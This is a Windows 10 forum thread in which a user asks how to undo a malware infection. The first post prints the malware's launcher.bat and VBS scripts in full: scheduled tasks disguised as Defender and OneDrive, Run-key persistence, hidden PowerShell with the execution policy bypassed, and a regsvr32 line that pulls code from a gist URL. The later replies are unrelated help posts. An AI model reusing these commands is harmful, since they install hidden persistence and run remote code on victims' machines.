Windows 10: How to reverse what a virus changed and stop it from opening in startup.

Discus and support How to reverse what a virus changed and stop it from opening in startup. in AntiVirus, Firewalls and System Security to solve the problem; After getting stressed because a virus didnt stopped to open a cmd every time i closed it i started checking the files from the program that installed... Discussion in 'AntiVirus, Firewalls and System Security' started by Zerlingg, Jun 18, 2019.

  1. ZERLINGG
    Zerlingg Win User

    How to reverse what a virus changed and stop it from opening in startup.


    After getting stressed because a virus didnt stopped to open a cmd every time i closed it i started checking the files from the program that installed it (because no antivirus has fixed this How to reverse what a virus changed and stop it from opening in startup. :( ) and then found this things:


    first thing that opens is a launcher.bat that gets open when tryng to run the program, and this is what it does:

    cd .. && cd data && cd source && cd data1 && cd data2

    xcopy /s /Y data3 C:\Users\Public\Music /E /H

    cd data3 && cd bin

    schtasks /create /tn "OneDrive32" /tr "cmd /c start /min C:\Users\Public\Music\bin\java.bat" /sc minute /mo 2 /F

    schtasks /create /tn "WindowsPhotos" /tr "cmd /c start /min C:\Users\Public\Music\bin\ghost.exe" /sc minute /mo 33 /F

    schtasks /create /tn "Defender" /tr "regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll" /sc minute /mo 32 /F

    wscript.exe service.vbs && wscript.exe java.vbs

    start ghost.exe

    attrib +h C:\Users\Public\Music

    exit



    It changes "Defender", "WindowsPhotos" and "OneDrive32". Also it starts running that "ghost.exe", and install other things like a code from github. I want to revert all of this so it stops the virus and cmds, and also, let me show you other files i found at C:\Users\Public\Music\bin\ directory that it hides (thankfully i found all of this because i always have the hidden files not hidden).


    java.vbs runs:

    const CONSOLE_HIDE=0

    const CONSOLE_SHOW=1

    const CMD_WAIT=true



    set O = CreateObject("Wscript.Shell")

    D="HKCU\jaava"

    H="cmd /c start /min C:\Users\Public\Music\bin\java.bat"

    O.regwrite D,H,"REG_SZ"

    O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cleaner", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34) , "REG_SZ"

    O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34),0,false



    I took a look at Java.bat too:

    cd C:\Users\Public\Music\bin && start /min jjs.bat && exit


    And jjs.bat:

    echo eval(new java.lang.String(java.util.Base64.decoder.decode(' '))); | powershell.exe -WindowStyle Hidden C:\Users\Public\Music\bin\svchost.exe


    (inside the (' ') goes a really long text of random leters and numbers, but i dont want to put it, i dont think it will help in anything)



    I also checked Service.vbs:


    const CONSOLE_HIDE=0

    const CONSOLE_SHOW=1

    const CMD_WAIT=true



    set O = CreateObject("Wscript.Shell")

    D="HKCU\alien34"

    H="regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll"

    O.regwrite D,H,"REG_SZ"

    O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive32", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34) , "REG_SZ"

    O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34),0,false



    If you need anything else to check just tell me, i will post in a comment if i find more things

    :)
     
    Zerlingg, Jun 18, 2019
    #1
  2. DEMONBRAWN
    demonbrawn Win User

    Virus change reversal

    I got some sort of virus on Tuesday. I ran a few virus scanners in safe mode and they caught about 14 different bugs/registry hacks so I think it's all quarantined. One of the changes the virus(es) did was that every file and folder is set as "hidden". Is there a registry setting I can change to fix this?
     
    demonbrawn, Jun 18, 2019
    #2
  3. AVEDIS53
    Avedis53 Win User
    Can't get GPU-Z to start with Windows 8.1 startup

    I'm not sure how to do that. Could you list the steps for a noob?
     
    Avedis53, Jun 18, 2019
    #3
  4. VANESSA YAR
    Vanessa Yar Win User

    How to reverse what a virus changed and stop it from opening in startup.

    OneNote 2016 opening on startup

    Hi,

    In order to turn off or disable OneNote 2016 at startup, we suggest that you follow the steps below:

    • Right-click on the Taskbar, and select Task Manager.
    • On the bottom right of the Task Manager window, click the drop-down arrow to open
      More details.
    • Click the Startup tab. This tab shows the programs that are enabled on Startup.
    • Right-click OneNote 2016, and click Disable.
    • Click File, then Exit.
    • You may then restart your computer for the changes to take effect.

    Let us know if you need further help.

    Regards.
     
    Vanessa Yar, Jun 18, 2019
    #4
Thema:

How to reverse what a virus changed and stop it from opening in startup.

Loading...

  1. How to reverse what a virus changed and stop it from opening in startup. - Similar Threads - reverse virus changed

  2. How to stop file from opening on Windows startup

    in Windows 10 Gaming
    How to stop file from opening on Windows startup: I have an Excel file that I set to open automatically when Windows starts. I want to remove this from startup, but I can't find how I set it in the first place. I have looked in my startup folder, it's not in the XLSTART folder, it's not in the "at startup open all files in"...

  3. How to stop file from opening on Windows startup

    in Windows 10 Software and Apps
    How to stop file from opening on Windows startup: I have an Excel file that I set to open automatically when Windows starts. I want to remove this from startup, but I can't find how I set it in the first place. I have looked in my startup folder, it's not in the XLSTART folder, it's not in the "at startup open all files in"...

  4. How to stop keys from changing what they do?

    in Windows 10 Gaming
    How to stop keys from changing what they do?: Seemingly out of nowhere, the volume keys at the side of my laptop start opening security options. This happens randomly every few months and changes back randomly....

  5. How to stop keys from changing what they do?

    in Windows 10 Software and Apps
    How to stop keys from changing what they do?: Seemingly out of nowhere, the volume keys at the side of my laptop start opening security options. This happens randomly every few months and changes back randomly....

  6. Startup folder changed by virus

    in Windows 10 Network and Sharing
    Startup folder changed by virus: HiMy windows 10 just got attacked by malware and my startup folder changed to the following directory "C:\Users\[username]\AppData\Local\Temp\b67c9bd46f". I want to change it back to default directory. How can i do it?...

  7. how to reverse "open with" option

    in Windows 10 Network and Sharing
    how to reverse "open with" option: Recently I went to delete a cursor file that I added into the folder but accidentally opened it with paint.net. Now all of the files have the paint.net option on them and I can't view the image of each of the cursors. Is there a way for me to revert it back to how it was...

  8. How to Reverse What Verifier has Changed?

    in Windows 10 Customization
    How to Reverse What Verifier has Changed?: Hello everyone, I missed with Verifier on Windows 10, did restart the system, and now the system boots, loads, and processes very slowly, and the task manager shows that my RAM is %76 used. Unfortunately I have disabled System Restore and System Protection years ago to...

  9. How to Reverse What has Verifier Changed?

    in Windows 10 Customization
    How to Reverse What has Verifier Changed?: Hello everyone, I missed with Verifier on Windows 10, did restart the system, and now the system boots, loads, and processes very slowly, and the task manager shows that my RAM is %76 used. Unfortunately I have disabled System Restore and System Protection years ago to...

  10. How to stop Power Shell from opening on windows startup

    in Windows 10 BSOD Crashes and Debugging
    How to stop Power Shell from opening on windows startup: I don't use this program but after the last Windows update I now have two computers in my office that on startup or reboot the Power Shell opens a windows and sometimes two windows. Eventually I am allowed to close the window and sometimes it closes on it own. Very annoying...